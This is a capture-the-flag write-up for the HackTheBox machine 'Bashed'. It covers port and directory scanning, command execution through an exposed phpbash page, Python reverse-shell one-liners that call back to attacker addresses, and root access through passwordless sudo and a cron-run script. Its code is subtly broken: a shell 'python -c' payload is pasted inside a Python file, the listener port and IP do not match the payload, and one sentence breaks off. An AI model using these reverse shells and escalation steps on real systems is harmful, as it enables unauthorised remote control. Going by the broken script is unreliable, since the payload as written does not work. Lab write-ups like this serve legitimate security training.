# Enumeration
## NMAP
We have an open port at 80, running Apache 2.4.18 (UBUNTU).
# nmap -A 10.10.10.68
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-08 03:14 EDT
Nmap scan report for 10.10.10.68
Host is up (0.050s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/8%OT=80%CT=1%CU=43586%PV=Y%DS=2%DC=T%G=Y%TM=606EAD62
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Network Distance: 2 hops
TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 50.56 ms 10.10.14.1
2 50.73 ms 10.10.10.68
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.14 seconds
## Let's see what's this website is about.## Dirbuster report
It reveals bunch of directories and files that are interesting:
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Thu Apr 08 03:25:09 EDT 2021
--------------------------------
http://10.10.10.68:80
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/
/css/
/dev/
/images/
/js/
/demo-images/
/php/
/uploads/
Dirs found with a 403 response:
/icons/
/icons/small/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/dev/phpbash.min.php
/index.html
/single.html
/css/carouFredSel.css
/css/clear.css
/dev/phpbash.php
/css/common.css
/css/font-awesome.min.css
/css/sm-clean.css
/js/jquery.js
/js/imagesloaded.pkgd.js
/js/jquery.nicescroll.min.js
/js/jquery.smartmenus.min.js
/js/jquery.carouFredSel-6.0.0-packed.js
/js/jquery.mousewheel.min.js
/js/jquery.touchSwipe.min.js
/js/jquery.easing.1.3.js
/js/main.js
/js/custom_google_map_style.js
/js/html5.js
/config.php
/php/sendMail.php
--------------------------------
The developer boasts about a phpbash file which he created onto the platform. Let's use it to get a foothold.
# Burp Suite
I am going to try and see the contents of the discovered files.
## Request
The file runs bash commands on the local host. Let's cat our flags 🙂
POST /dev/phpbash.min.php/ HTTP/1.1
Host: 10.10.10.68
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Origin: http://10.10.10.68
Referer: http://10.10.10.68/dev/phpbash.min.php/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
cmd=cd /home/arrexel;pwd;ls;cat user.txt;
## Response
user flag: 2c281f318555dbc1b856957c7147bfc1
HTTP/1.1 200 OK
Date: Thu, 08 Apr 2021 08:02:27 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 56
Connection: close
Content-Type: text/html; charset=UTF-8
/home/arrexel
user.txt
2c281f318555dbc1b856957c7147bfc1
### Let's see how we can escalate our privileges and gain root.
Firstly, get reverse shell:
1. change attacking IP:PORT
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
### Let's upgrade our shell, so that we could make it more usable:
1. Spawn better shell: python3 -c 'import pty;pty.spawn("/bin/bash")'
2. Get access to term commands: export TERM=xterm
3. Background the shell with CNTRL + Z and turn on autocomplete etc. by typing in original terminal: stty raw -echo; fg
# Privelege Esc.
* Ran linenum.sh locally but nothing really was of interest.
* Looked for SGID/SUID files.
* finally looking into sudoers I received the following output:
$ sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
It seems we (www-data) could run commands as user scriptmanager since it does not require password.
$ sudo -u scriptmanager whoami
scriptmanager
To become user *scriptmanager* we type in:
sudo -u scriptmanager bash -i
Let's enumerate further. What does this user owns or has access to?
scriptmanager@bashed:/$ find / -type f -user scriptmanager 2>/dev/null
/scripts/test.py
/home/scriptmanager/.profile
/home/scriptmanager/.bashrc
/home/scriptmanager/.selected_editor
/home/scriptmanager/.bash_history
/home/scriptmanager/.bash_logout
It appears it owns something within /scripts/test.py
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
It opens test.txt and writes a string into it, hmm. Who owns test.txt?
scriptmanager@bashed:/scripts$ ll
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Apr 8 03:19 ./
drwxr-xr-x 23 root root 4096 Dec 4 2017 ../
-rw-r--r-- 1 scriptmanager scriptmanager 282 Apr 8 03:19 test.py
-rw-r--r-- 1 root root 12 Apr 8 03:03 test.txt
So, if it is executed by cron, test.py runs as root since it opens test.txt which is owned by root. Let's add sauce: [python reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("change 123!")
python -c 'import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.6",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
f.close
It writes out the
### pwn
# nc -lnvp 1337
listening on \[any\] 1337 ...
connect to \[10.10.14.24\] from (UNKNOWN) \[10.10.10.68\] 50176
/bin/sh: 0: can’t access tty; job control turned off
# whoami
root
# cat /root/root.txt
0 Comments
Recommended Comments
Няма коментари